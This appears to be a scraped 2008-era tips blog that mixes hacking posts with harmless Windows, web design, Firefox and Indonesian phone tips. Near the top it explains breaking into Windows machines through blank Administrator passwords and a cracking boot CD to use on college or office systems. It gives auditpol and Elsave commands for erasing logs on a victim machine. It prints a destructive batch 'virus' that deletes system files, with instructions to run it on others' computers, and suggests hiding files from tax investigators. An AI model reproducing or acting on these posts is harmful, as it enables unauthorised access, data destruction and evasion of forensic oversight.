In Windows NT 5.x, you can create any no. of user with different names & privilege and optionally password. One such account with highest privilege level, with user name “Administrator” is setup by default (at par with UNIX/Linux’s root account).

At the time of installation Windows NT 5.x prompts for password but many system are setup by vendors and other person. The user of the system is different than one who installed and these lazy people are always in hurry and SKIP this password window. (Now I feel this is something wrong with Windows. It should be like Linux’s installer anaconda who forces you to provide password for “root” user).

The irony comes next. In final step of installation you create an account. Lock it with password(optionally) and start using the system. Now on welcome screen you see account(s) with different name. But have you ever seen “Administrator” account name (except you skipped somehow to create another account or booting in safe mode”).

Now if u can’t see “Administrator” account on screen, and system is locked against administrator privilege. You can hit “CTRL+ALT+DEL” (in Windows XP) to get Authentication window of Windows 2000 style.). If you still fail to get windowed login screen, boot the computer in safe mode ( It is done by pressing F8 during booting and selecting "Safe Mode" from the menu ).

Once you get dialog box. Enter user name “Administrator”, leave password field blank and hit ENTER to brake into the system! This is what works 80% of the time (I know its hard to believe but rather simple to TRY IT OUT!!!!).

Now for rest of the 20% system (where “Administrator” password is not blank). There are literally more than 100’s of tool available on Internet and the tool I use, I like, I refer is here.
I don’t know its name. I got it from my hacker friend ROGER. I named it WinPass.iso. Its an ISO image and you can download it from megshare where I kept it for downloading! Burn this ISO on a CD… Its bootable image of 2.7 MB.

It has Linux OS with text-mode only. (No Linux Knowledge Require here!!! Great naa….). After booting from CD… A menu driven program will start with options and their description at each level.

READ EVERYTHING BEFORE GOING AHEAD as any wrong-turn will make the target machine unstable. One mistake may crash the system to the reinstallation phase! So test it first on systems from college, office, etc!

It worked 100% of the time….As its 3.03 MB (after extracting) you can burn it on a mini-CD and keep it in your wallet all the time, so can roam around having master key to all systems having Windows NT 5.x family OS!!!

You can search on Google for Windows Password Cracking And Hacking Tools and would get plenty of them. Soon I would be posting as in how these softwares work. Njoy !!!

Read More......

How hackers can erase their tracks after hacking.

Whenever someone comes in contact with another person, place, or thing, something of that person is left behind. This means that the attacker must disable logging, clear log files, eliminate evidence, plant additional tools and cover his tracks.

Here are some of the techniques that an attacker can use to cover his tracks:-

(1) Disabling logging – Auditpol was originally included in the NT Resource kit for administrators. It works well for hackers too, as long as they have administrative access.
Just point it at the victim’s system as follows:
C:\>auditpol \\192.168.10 /disable
Auditing Disabled

(2) Clear the log file – The attacker will also attempt to clear the log. Tools, such as Winzapper, evidence Eliminator, or Elsave, can be used. Elsave will remove all entries from the logs, except one entry that shows the logs were cleared.
It is used as follows:

Elsave -s \\192.168.13.10 -1 “Security” -C

(3) Cover their tracks – One way for attackers to cover their tracks is with rootkits. Rootkits are malicious codes designed to allow an attacker to get expanded access and hide his presence. While rootkits were traditionally a Linux tool, they are now starting to make their way into the Windows environment. Tools, such as NTrootkit and AFX Windows rootkits, are available for Windows systems. If you suspect that a computer has been rootkitted, you need to use an MD5 checksum utility or a program, such as Tripwire, to determine the viability of your programs. The only other alternative is to rebuild the computer from known good media.

Read More......

Viruses for Irritating (plz dont try on ur pc)

@echo off
@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe
msg "WARNING:A VIRUS TOOK OVER YOUR COMPUTER VIRUS NOTICED AS:RINSE JOHN hacked your IP.exe"

Copy these lines in notepad and save it as "rinse.bat" or "rinse.exe"

Try this on any other computer..... Very heavy Virus..

Read More......

Secretly Hide Any File Inside JPG Image File

Few months ago , USA Today story claimed that al-Qaeda operatives were sending out encrypted messages by hiding them inside digital photographs [jpg files] on eBay.

While the claim was never proved, it is very easy to hide [or embed] any other file[s] inside a JPEG image. You can place video clips, pdf, mp3, Office documents, zipped files, webpage or any other file format inside a JPEG image.

And when a suspecting user [read CIA, FBI] tries to open that jpeg file [with concealed information] in either a photo editing software or as a thumbnail inside Windows Explorer, it would be tough to make out if this camouflaged jpg file is different from any standard jpg image.

Let's say you want to hide a confidential PDF document from the tax investigation officers. What you can do is convert that file into a regular jpg image so even if anyone double-clicks this file, all he will see is a preview of the image and nothing else. And when you want to work on the actual PDF, just rename the extension from jpg to pdf.


Here's the full trick:

Step 1: You will need two files - the file you want to hide and one jpg image - it can be of any size or dimensions. [If you want to hide multiple files in one jpeg image, just zip them into one file]

Step 2: Copy the above two files to the C: folder and open the command prompt window.

Step 3: Move to the c: root by typing cd \ [if the files are in another folder, you'll have to change the prompt to that folder]

Step 4: The most important step - type the following command:

copy /b myimage.jpg + filetohide.pdf my_new_image.jpg


To recover the original PDF file, just rename my_new_image.jpg to filename.pdf.

Here we illustrated with an pdf file as that works with simple renaming. If you want to apply this technique to other file formats like XLS, DOC, PPT, AVI, WMV, WAV, SWF, etc, you may have to first compress them in RAR format before executing the copy /b DOS command.

To restore the original file, rename the .jpg file to .rar and extract it using 7-zip or Winrar.

Read More......

Disable Dr. Watson

Watson is a debugging tool in windows , which sometimes becomes quite irritating when ever it pops up suddenly .

Here is a method to disable it , if it bugs you :

Dr. Watson can be disabled using the registry editor:

1. Start the registry editor (Start >> Run >> type "regedit.exe" >> Hit enter )
2. Navigate to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ AeDebug
3. Click on AeDebug and click Del

Alternativly just set HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ AeDebug \ AUTO to 0

Read More......

Web Design Tips

While designing web sites it is important to keep in the mind the platform, popularly used web browsers and of course the users. One more important element of website design is search engines compatibility, since eventually the search engines will index the site to present it to the users in a search. How much the search engines give importance to your website depends a lot on the how the website is designed.
These tips will help web designers to justify what is stated above.

1) Use colors carefully such that they are brand appropriate or do justice to whatever the site is providing. This applies to the text, text fonts, background and the content provided.

2) Use tag lines, which highlight the essential features of the site and catch the attention of the readers, since visitors do not read the text fully. Set your content in proper paragraphs and columns for increased readability and appearance.

3) Avoid Flash and client side scripts on main pages. Do not use FRAMES since search engines find it difficult to index pages using the above technologies.


4) Use high-resolution graphics which are light in weight for faster downloading. The images should add to the content and help in describing the sites resources and services. The images should be appropriately placed on the web pages. Use alt text to describe the images properly for photo optimization.

5) For search engine optimization use descriptive title and meat tags since the search engine use these to some extent to index and rank your website.

6) Avoid using gate away or doorway pages which lead to the main page this is spamming and your website may be banned by major search engines. Do not resort to cloaking and over use of keywords.

7) Most important do not copy content from other websites to avoid facing duplicate content penalty. This was the practice widely resorted to earlier. It is wiser to have a content writer in the web development team.

Read More......

How to mount an ISO image in Windows Vista

The freeware utility from Microsoft to mount ISO Images doesn't work in Windows Vista. Thankfully there's another utility that does.

The utility that we will use is called Virtual Clone Drive. This utility will let you mount .ISO, .CCD, .DVD, .IMG, .UDF and .BIN files. Download the utility and start the setup process.



Select Yes or OK at the hardware prompt and continue. You might have to restart your computer. Now you should be able to mount any ISO image by just double-clicking on the file. Note: If you are going to reinstall this utility, make sure you uninstall it first, or you'll BSOD yourself repeatedly.

This utility does not work on Windows Vista 64 bit edition.

Alternatives

* Virtual CD-ROM (Microsoft) - This utility does not work in Windows Vista
* MagicDisk - This is a nice, free utility, but it isn't very easy to install in Vista64.
* Alcohol 52% - Free version of Alcohol 120, but it bundles a browser toolbar that they claim isn't spyware. It's unacceptable.
* Daemon Tools - Well known tool, but the latest version installs spyware on your computer, and the old version doesn't work in Vista.

At this point, Virtual CloneDrive is by far my favorite free utility.

Read More......

Wednesday, December 24, 2008

How to insert any favorite text as bullet in Word?

In Microsoft Word, lists of items or important points of a specific topic are presented in the documents in a prominent way by applying default bullets and numbering. By default, word provides only few built-in bullets and numbers to prominent your important points. But if you wish to use your name or any favorite word as a bullet then you can modify the default bullets lists.

Follow the given steps to modify the default bullets with your favorite name:

First click on Start button, go to Program then click on Microsoft Word to run the word page.



Now go to File menu and click on Open option to open any word file. Then go to Format menu and click on Bullets and Numbering option.




Here a small dialog will appear with title "Bullets and Numbering", now click on one of the number formats that you are not using in the document and click on Customize button.






In the number format box, type your favorite text (in this case, we are using Tony, Google and MSN as bullets, you can set a different font if you like, or the underlying paragraph font will be used).




You can enter 30 characters in the box which should be sufficient for most of the uses to which this is likely to be put






Read More......

Firefox Keyboard Shortcuts - Mozilla Firefox Hotkeys

Windows Keyboard Shortcuts for Mozilla Firefox
CTRL + A Select all text on a webpage
CTRL + B Open the Bookmarks sidebar
CTRL + C Copy the selected text to the Windows clipboard
CTRL + D Bookmark the current webpage
CTRL + F Find text within the current webpage
CTRL + G Find more text within the same webpage
CTRL + H Opens the webpage History sidebar
CTRL + I Open the Bookmarks sidebar
CTRL + J Opens the Download Dialogue Box
CTRL + K Places the cursor in the Web Search box ready to type your search
CTRL + L Places the cursor into the URL box ready to type a website address
CTRL + M Opens your mail program (if you have one) to create a new email message
CTRL + N Opens a new Firefox window
CTRL + O Open a local file
CTRL + P Print the current webpage
CTRL + R Reloads the current webpage
CTRL + S Save the current webpage on your PC
CTRL + T Opens a new Firefox Tab
CTRL + U View the page source of the current webpage
CTRL + V Paste the contents of the Windows clipboard
CTRL + W Closes the current Firefox Tab or Window (if more than one tab is open)
CTRL + X Cut the selected text
CTRL + Z Undo the last action

Windows Keyboard Shortcuts for Mozilla Firefox
F1 Opens Firefox help
F3 Find more text within the same webpage
F5 Reload the current webpage
F6 Toggles the cursor between the address/URL input box and the current webpage
F7 Toggles Caret Browsing on and off. Used to be able to select text on a webpage with the keyboard
F11 Switch to Full Screen mode

Read More......

Sunday, December 14, 2008

Searching Information tips using Search Engine

If you want to get some information about any topic using search engine, the search engine will search the given information and will provide a list of links of websites along brief description about each website. You should use the right search terms for relevant results.

The following points must be noted to search the information on the internet.

·You can type all word in lowercase and also in uppercase, search engine will return the same result. But the best practice is type search keywords always in lowercase.

* Use + sign between words if you want to search the all words. For example, to search history of Football in Europe, type as:
history+Football+Europe

* To search the exact match, write the words in double quotation marks. For example to search the map of Europe, then type as:
Map of Europe"

* Always avoid to use "and", "or" with search keywords, because these words will affect the search result.

Read More......

Wednesday, December 3, 2008

Tips & Trik Handphone Kemasukan Air






Selalu ada kemungkinan ponsel terjatuh ke dalam air tanpa disengaja, atau basah kuyup ketika Anda menerjang hujan. Padahal barang elektronik sangat rentan rusak jika terkena air.

Sebelum Anda buru-buru memperbaikinya ke teknisi, ada baiknya Anda berusaha terlebih dahulu menyelamatkan ponsel itu. Siapa tahu ponsel Anda pulih tanpa perlu ke ‘bengkel’. Simak tips berikut ini, yang dikutip detikINET dari WikiHow, Senin (3/3/2008).

* Jika ponsel Anda terendam, keluarkan ponsel dari air secepatnya untuk mencegah

komponen bagian dalam terkontaminasi air. Dalam beberapa kasus, casing ponsel memang cukup

rapat untuk mencegah rembesan air. Namun hal ini hanya akan bertahan selama beberapa puluh

detik.
* Segera keluarkan baterai dari dalam ponsel. Memutus aliran sumber daya sangatlah

penting untuk meminimalisir kemungkinan kerusakan ponsel. Beberapa sirkuit elektronik

dinyatakan bisa tetap bertahan dalam keadaan basah, jika tidak terhubung dengan sumber daya.
* Segera keluarkan juga kartu SIM Anda untuk mencegah kemungkinan kerusakan atau

kehilangan data. Anda tentu tak ingin phonebook atau SMS penting Anda lenyap. Biarkan kartu

SIM Anda sampai benar-benar kering sebelum Anda mengecek kondisinya.
* Keringkan ponsel sampai benar-benar kering. Gunakan kain yang bisa menyerap air. Jika

ada, gunakan juga pengering rambut alias hair dryer. Namun pastikan ponsel Anda jangan

sampai terlalu panas. Jangan pula meletakkannya di microwave. Ponsel yang terlalu panas

dilaporkan bisa meledak.
* Uji coba kondisi ponsel Anda setelah benar-benar kering. Jika ponsel ngadat,

periksalah apakah ponsel atau baterai Anda yang rusak, dengan memakai baterai cadangan. Jika

hanya baterainya yang rusak, Anda tinggal membeli yang baru.
* Jika seluruh langkah tersebut telah Anda lakukan namun ponsel tetap mengalami

kerusakan, apa boleh buat, Anda tampaknya harus mengandalkan jasa teknisi ponsel. Namun

ingat, Anda harus mencari teknisi ponsel yang terpercaya (sumber:radjacell.com)







Read More......

Trik HP Nokia

Saling berbagi merupakan hal yang positif, tapi berbagi apa dulu. D nah, disini penulis mau berbagi tentang tips Handphone nokia yang selama ini paling banyak di gunakan oleh orang-orang. sebenarnya, penulis dapet dari sumber juga sih, ;) . langsung aja, Start!

*3370# Untuk mengaktifkan Full Rate Codec (EFR) - HP Nokia kamu akan memiliki kualitas suara yang maksimal tapi, waktu bicara akan berkurang sekitar 5%
#3370# Untuk mematikan Full Rate Codec (EFR)
*#4720# Mengaktifkan Half Rate Codec - Ponsel nokia kamu akan memiliki kualitas suara terendah, tetapi akan meningkatkan waktu bicara (Talk time) sekitar 30%
*#4720# Mematikan fungsi Half Rate Codec
*#0000# Menampilkan informasi firmware ponsel
*#9999# Menampilkan informasi firmware ponsel jika *#0000# ngga jalan
*#06# Untuk mengetahui International Mobile Equipment Identity (IMEI Number) kita
#pw+1234567890+1# Mengunci status provider. (gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+” )
#pw+1234567890+2# Mengunci status Network. (gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+” )
#pw+1234567890+3# Mengunci Status Country. (gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+” )
#pw+1234567890+4# Mengunci status SIM Card. (gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+” )
*#147# mengetahui siapa yang nelpon kamu terakhir kali (hanya untuk vodofone)
*#1471# panggilan terakhir (hanya nntuk vodofone)
*#21# Mengetahui kemana semua panggilan dialihkan
*#2640# Menampilkan security code yang sedang digunakan
*#30# untuk menampilkan private number (Biasanya IM3 neh)
*#43# untuk memeriksa status “Call Waiting” di ponsel kamu.
*#61# untuk memeriksa nomor panggilan yang “On No Reply”
*#62# untuk memeriksa nomor panggilan yang “Divert If Unreachable (no service)” dan mengetahui kemana dialihkannya
*#67# untuk memeriksa nomor panggilan yang “On Busy Calls” dan mengetahui kemana dialihkannya
*#67705646# untuk menghilangkan logo operator pada 3310 & 3330
*#73# Untuk menghapus timer ponsel dan score pada games ponsel
*#746025625# Menampilkan SIM Lock Status, kalo ponsel kamu mendukung fungsi power saving “SIM Clock Stop Allowed”, itu berarti kamu bisa mendapatkan waktu terbaik untuk standby (Berapa lama kamu standby)
*#7760# kode produk
*#7780# mengembalikan settingan pabrik
*#8110# melihat versi untuk nokia 8110
*#92702689# menampilkan - 1.serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 untuk no repair), 5.Transfer User Data. Untuk keluar dari mode ini, kamu perlu me-restart HP kamu
*#94870345123456789# mematikan fungsi PWM-Mem
**21*nomorhp# menghidupkan “All Calls” dan mengalikan ke nomer yang tertulis
**61*nomorhp# menghidupkan “No Reply” dan mengalikan ke nomer yang tertulis
**67*nomorhp# menghidupkan “On Busy” dan mengalikan ke nomer yang tertulis
12345 ini security code bawaan nokia (Standard)

Perhatikan baik2 sblm mencoba.. jika anda tidak mengerti maksudnya jangan dicoba2 skaligus. karna, sayo tidak bertanggung jawab kalo data2 kamu hilang karena terlalu banyak mengotak atik

Read More......